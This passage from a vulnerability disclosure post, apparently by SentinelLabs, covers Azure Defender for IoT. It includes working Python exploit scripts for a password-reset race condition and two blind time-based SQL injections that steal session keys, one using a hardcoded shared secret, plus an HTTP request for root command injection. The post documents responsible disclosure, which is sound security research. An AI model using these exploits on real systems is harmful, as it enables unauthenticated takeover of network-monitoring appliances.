            // ignored in the PoC
        }
    }
}
As mentioned, the applianceId is obtained from the password recovery page. The tenantId is not verified and thus can be anything.

The issuanceDate parameter is self-explanatory.

Once generated and signed, it can be added to a ZIP archive and be used by the following Python exploit script:

import requests
import threading
import time
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

HOST = ""
BENIGN_RESET_PATH = ""     # path to the legitimate recovery ZIP from the Azure portal
MALICIOUS_RESET_PATH = ""  # path to the specially-crafted ZIP (variable name reconstructed)
BENIGN_DATA = open(BENIGN_RESET_PATH, "rb").read()
MALICIOUS_DATA = open(MALICIOUS_RESET_PATH, "rb").read()

def upload_reset_file(data, timeout=0):
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    }
    cookies = {
        "csrftoken": "aaaa"
    }
    files = {"file": data}
    data = {"path": "reset_password"}
    while True:
        requests.post("https://{0}/api/configuration/zip-file".format(HOST), data=data, files=files, headers=headers, cookies=cookies, verify=False)
        if not timeout:
            continue
        time.sleep(timeout)

def recover_password():
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    }
    cookies = {
        "csrftoken": "aaaa"
    }
    data = {"user": "cyberx"}
    while True:
        req = requests.post("https://{0}/api/authentication/recover".format(HOST), json=data, headers=headers, cookies=cookies, verify=False)
        if b"newPassword" in req.content:
            print(req.content)
            break

def main():
    looper_benign = threading.Thread(target=upload_reset_file, args=(BENIGN_DATA, 0), daemon=True)
    looper_malicious = threading.Thread(target=upload_reset_file, args=(MALICIOUS_DATA, 1), daemon=True)
    looper_recover = threading.Thread(target=recover_password, args=(), daemon=True)
    looper_benign.start()
    looper_malicious.start()
    looper_recover.start()
    looper_recover.join()

if __name__ == '__main__':
    main()

The benign file is the ZIP obtained from the Azure portal, as described above, and the malicious file is the specially-crafted ZIP.

The exploit script above performs the TOCTOU attack to reset and receive the password of the cyberx username without authentication at all. It does so by utilizing three threads:

  • looper_benign – responsible for uploading the benign ZIP file in an infinite loop
  • looper_malicious – the same as looper_benign but uploads the malicious ZIP, in this configuration with a 1-second timeout
  • looper_recover – sends the password recovery request to trigger the vulnerable code

Somewhat ironically, the documentation mentions that the ZIP file cannot be tampered with.

This vulnerability is addressed as part of CVE-2021-42310.

Unauthenticated Remote Code Execution As Root #1

At this point, we can obtain a password for the privileged user cyberx. This allows us to log in to the SSH server and execute code as root. Even without this, an attacker could use a stealthier approach to execute code.

After logging in with the obtained password, the attack surface is vastly increased. For example, we found a simple command injection vulnerability within the change password mechanism:

From components\xsense-web\cyberx_web\api\

    def _post(self):
        try:
            body = self.parse_body()
            password = body['password']
            username = body['username'].lower()  # Lower case the username mainly because it does not matter
            ip_address = self.get_client_ip_address()
            # 1. validate credentials:
            try:
                'validate credentials...')
                user = LoginApiHandler.validate_credentials_and_get_user(username, password, ip_address)
            except UserFriendlyException as e:
                raise e
            except Exception as e:
                logging.error('User authentication failure', exc_info=True)
                raise UserFriendlyException('User authentication failure', e.message)
            # 2. validate new password:
            new_password = body['new_password']
            err_message = UserPasswordApiHandler.validate_password(new_password)
            if err_message:
                raise UserFriendlyException("Password doesn't match security policy", err_message)
            # 3. change password:
            # (name of the command-execution helper is elided in the decompiled source)
            run_command('sudo /usr/local/bin/cyberx-users-password-reset -u {username} -p {password}'
                        .format(username=user.get_username().encode('utf-8'), password=new_password), hide_output=True)
            return {'msg': 'Password has been replaced.'}
        except UserFriendlyException as e:
            raise e
        except Exception as e:
            raise UserFriendlyException("Unable to set password.", e.message)

The function receives three JSON fields from the user, “username”, “password”, “new_password”.

First, it validates the username and password, which we already have. Next, it checks only the complexity of the new password using a regex, but does not sanitize the input for command injection primitives.

After the validation, it executes the /usr/local/bin/cyberx-users-password-reset script as root with the attacker-controlled username and new password. Since the function doesn't properly sanitize the "new_password" input, we can inject any command we choose, and because the cyberx user is a sudoer, the injected command runs as root via sudo.
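To see why backticks matter here, this sketch builds the string the handler hands to the shell (the command template is quoted from the code above; the payload value is illustrative):

```python
# Attacker-chosen new_password: satisfies a typical complexity regex, but carries
# a command-substitution payload in backticks.
username = "cyberx"
new_password = "Str0ngPass!`touch /tmp/pwned`"
cmd = ('sudo /usr/local/bin/cyberx-users-password-reset -u {username} -p {password}'
       .format(username=username, password=new_password))
print(cmd)
# When this string is evaluated by a shell, the backticks are expanded as command
# substitution before the reset binary ever sees its -p argument, so the payload
# runs with root privileges.
```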

This can be exploited with the following HTTP packet:

POST /api/external/authentication/set_password HTTP/1.1
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cyberx-version=; csrftoken=aaaa; sessionid=kcnjq7wby7c28rxnppcex20gkajej3km; RELOCATE_URL=
Content-Length: 100
Content-Type: multipart/form-data; boundary=47dd42bb4cf2abb6e9c4c81019d8fbb4

{"username" : "cyberx", "password" : "",
"new_password": "``"}

This vulnerability is addressed as part of CVE-2021-42312.


In the remainder of this post, we present two additional attack routes with new vulnerabilities, as well as a vulnerability in the traffic processing framework.

These vulnerabilities are basic SQL Injections (with a twist), yet they have a high impact on the security of the product and the organization’s network.


The DynamicTokenAuthenticationBaseHandler class inherits from BaseHandler and does not require authentication. This class contains two functions (get_version_from_db, uuid_is_connected) which are prone to SQL injection.

def get_version_from_db(self, uuid):
    version = None
    with MySQLClient("", mysql_user, mysql_password, "management") as client:
        "fetching the sensor version from db")
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        if len(xsenses) > 0:
            version = xsenses[0]['version']
            "sensor version according to db is: {}".format(version))
        else:
            "sensor not in db")
    return version

def uuid_is_connected(self, uuid):
    with MySQLClient("", mysql_user, mysql_password, "management") as client:
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        result = len(xsenses) > 0
    return result

As shown, the UUID parameter is not sanitized before being formatted into an SQL query. A couple of classes inherit from DynamicTokenAuthenticationBaseHandler, and the flow to the vulnerable functions is reachable during the token validation process itself.

Therefore, we can trigger the SQL injection without authentication.

These vulnerabilities can be triggered from:

  1. api/sensors/v1/sync
  2. api/v1/upgrade/status
  3. api/v1/upgrade/upgrade-log

It is worth noting that the function execute_select_query internally calls the SQL execute API, which supports stacked queries. This turns the “simple” SELECT SQL injection into a much more powerful primitive, namely executing any query by chaining statements with ‘;’. In our testing we managed to insert, update, and execute special SQL commands.
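To illustrate what stacked queries buy an attacker, this sketch shows the query string the server ends up executing for a crafted UID (the appended UPDATE statement is illustrative only):

```python
# Query template quoted from get_version_from_db(); the UID payload closes the
# string literal, terminates the SELECT, and appends a second statement.
template = "SELECT id, UID, version FROM xsenses WHERE UID = '{}'"
uid = "x'; UPDATE xsenses SET version = 'pwned'; -- "
print(template.format(uid))
# SELECT id, UID, version FROM xsenses WHERE UID = 'x'; UPDATE xsenses SET version = 'pwned'; -- '
```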

For the PoC of this vulnerability, we used the api/sensors/v1/sync API. We created the following script to extract a logged-in user’s session ID from the database, which eventually allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

HOST = ""

def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2,3 -- a".format(currChr, currBit)
            body = {
                "token": "aleg",
                "uid": sql
            }
            now =
            res ="https://" + HOST + "/api/sensors/v1/sync", json=body, verify=False)
            if ( - now).seconds > 2:
                bitStr += "1"
            else:
                bitStr += "0"
        final = bitStr[::-1]
        print(int(final, 2))
        chrNum = int(final, 2)
        if not chrNum:
            break
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)

def main():
    startAttack()

if __name__ == "__main__":
    main()

An example of this script output:

After extracting the session ID from the database, we can log in to the management web interface, at which point there are several methods to execute code as root. For example, we could change the password and log in to the SSH server (these users are sudoers), use the script scheduling mechanism, or use the command injection vulnerability we mentioned earlier in this post.
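The SQL injection script above never sees the session key directly; it infers each character one bit at a time from response timing. The reassembly step can be sketched in isolation:

```python
# For the character 'a' (ord 97), the eight timing probes test bits 0..7, LSB first;
# a slow response (sleep(3) fired) means the probed bit is 1.
ch = 'a'
bits = [(ord(ch) >> b) & 1 for b in range(8)]   # what the timing probes reveal
bit_str = "".join(str(b) for b in bits)          # "10000110", LSB first
recovered = int(bit_str[::-1], 2)                # reverse to MSB first -> 97
print(chr(recovered))  # 'a'
```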

This attack is made easier by the lack of session validation. There is no further layer of validation, such as verifying that the session ID is used from the same IP address and User-Agent as the initiator of the session.


The UpdateHandshakeHandlers::is_connected function is also prone to SQL injection.

The class UpdateHandshakeHandlers inherits from BaseHandler, which is accessible to unauthenticated users, and can be reached via the API: /api/v1/token/update-handshake.

However, this time there is a twist: the _post function does token verification.

class UpdateHandshakeHandlers(BaseHandler):
    def __init__(self):
        super(UpdateHandshakeHandlers, self).__init__()
        self.update_secret = update_secret

    def is_connected(self, sensor_uid):
        with MySQLClient("", mysql_user, mysql_password, "management") as client:
            "fetching the sensor version from db")
            xsenses = client.execute_select_query(
                "SELECT id, UID FROM xsenses WHERE UID = '{}'".format(sensor_uid))
            if len(xsenses) > 0:
                "sensor {} found on db".format(sensor_uid))
                return True
            else:
                "sensor {} not in db".format(sensor_uid))
                return False

    def _post(self):
        try:
            body = self.parse_body()
        except Exception as ex:
            return self.generic_handler(self.invalid_body)
        try:
            sensor_update_secret = body['update_secret']
            sensor_uid = body['xsenseUID']
            if sensor_update_secret != self.update_secret:
                raise Exception('invalid secret')
            if not self.is_connected(sensor_uid):
                raise Exception('only supported with connected sensors')
        except Exception as ex:
            logging.exception('failed to fetch new token')
            return self.generic_handler(self.invalid_token)
        "update handshake succeeded")
        token = {
            'token': tokens.get_token()
        }
        return token

This means the API requires a secret token, and without it we cannot exploit this SQL injection vulnerability. Fortunately for an attacker, this API token is not much of a secret: the update token is hardcoded in the file and shared across all Defender For IoT installations worldwide, which means that an attacker may exploit this vulnerability without any authentication.

We created the following script to extract a logged-in user’s session ID from the database, which allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

HOST = ""

def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2 -- a".format(currChr, currBit)
            body = {
                "update_secret": "93960370-2f5f-4be1-813e-b7a3768ad288",
                "xsenseUID": sql
            }
            now =
            res ="https://" + HOST + "/api/v1/token/update-handshake", json=body, verify=False)
            if ( - now).seconds > 2:
                bitStr += "1"
            else:
                bitStr += "0"
        final = bitStr[::-1]
        print(int(final, 2))
        chrNum = int(final, 2)
        if not chrNum:
            break
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)

def main():
    startAttack()

if __name__ == "__main__":
    main()

As with the first SQL injection vulnerability, after extracting the session ID from the database, we can use any of the methods mentioned above to execute code as root.


The sensor machine uses RCDCAP (an open source project) to open CISCO ERSPAN and HP ERM encapsulated packets.

The ERSPANProcessor::processImpl and HPERMProcessor::processImpl methods are vulnerable to a wildcopy heap-based buffer overflow, which can potentially allow arbitrary code execution when processing specially crafted input.

This vulnerability was found by locally fuzzing RCDCAP with pcap files and occurs when this line is executed:


std::copy(&packet[offset + MACHeader802_1Q::getVLANTagOffset()],
          &packet[caplen],
          &packet[MACHeader802_1Q::getVLANTagOffset() + MACHeader802_1Q::getVLANTagSize()]);
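A note on why this is a "wildcopy": std::copy(first, last, dst) keeps copying until first reaches last. Assuming a truncated capture where caplen ends up smaller than the computed source start (the sizes below are illustrative, not taken from the fix), the range is inverted and a forward-walking pointer never terminates in bounds:

```python
# Illustrative sizes only: a short caplen versus a larger encapsulation offset.
offset, vlan_tag_offset, caplen = 64, 12, 60
src_start = offset + vlan_tag_offset   # 76: first element of the source range
range_len = caplen - src_start         # -16: the [first, last) range is inverted
print(range_len)
# With raw pointer iterators, incrementing `first` from 76 never reaches 60, so
# the copy tramples heap memory far past the packet buffer.
```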

This was reported to the code owner and MSRC; the code owner has already issued a fix.

MSRC, however, decided that this vulnerability does not meet the bar for an MSRC security update, and the development group may decide to fix it as needed.


  • Who is affected? Unpatched installations of Azure Defender for IoT are affected. Since this product has many configurations, for example RTOS, which have not been tested, users of those systems may be affected as well.
  • What is the risk? A successful attack may lead to full network compromise, since Azure Defender For IoT is configured to have a TAP (Terminal Access Point) on the network traffic. Access to sensitive information on the network could open a number of sophisticated attack scenarios that could be difficult or impossible to detect.


We responsibly disclosed our findings to MSRC in June 2021, and Microsoft released a security advisory with patch details in December 2021, which can be found here, here, here, here and here.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials that were deployed to the platform before it was patched, and checking access logs for irregularities.


Cloud providers heavily invest in securing their platforms, but unknown zero-day vulnerabilities are inevitable and put customers at risk. It’s particularly concerning when it comes to IoT and OT devices that have little to no defenses and depend entirely on these vulnerable platforms for their security posture. Cloud users should take a defense-in-depth approach to cloud security to ensure breaches are detected and contained, whether the threat comes from the outside or from the platform itself.

As part of SentinelLabs’ commitment to advancing public security, we actively invest in research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies and widely share our findings in the interest of protecting all users.

Disclosure Timeline

  • June 21, 2021 – Initial report to MSRC.
  • June 24, 2021 – Initial response from MSRC.
  • June 30, 2021 – MSRC requests a PoC video and code.
  • July 1, 2021 – We shared the code and a PoC video with MSRC.
  • July 16, 2021 – MSRC confirmed the bug and started working on a fix.
  • December 14, 2021 – MSRC released an advisory.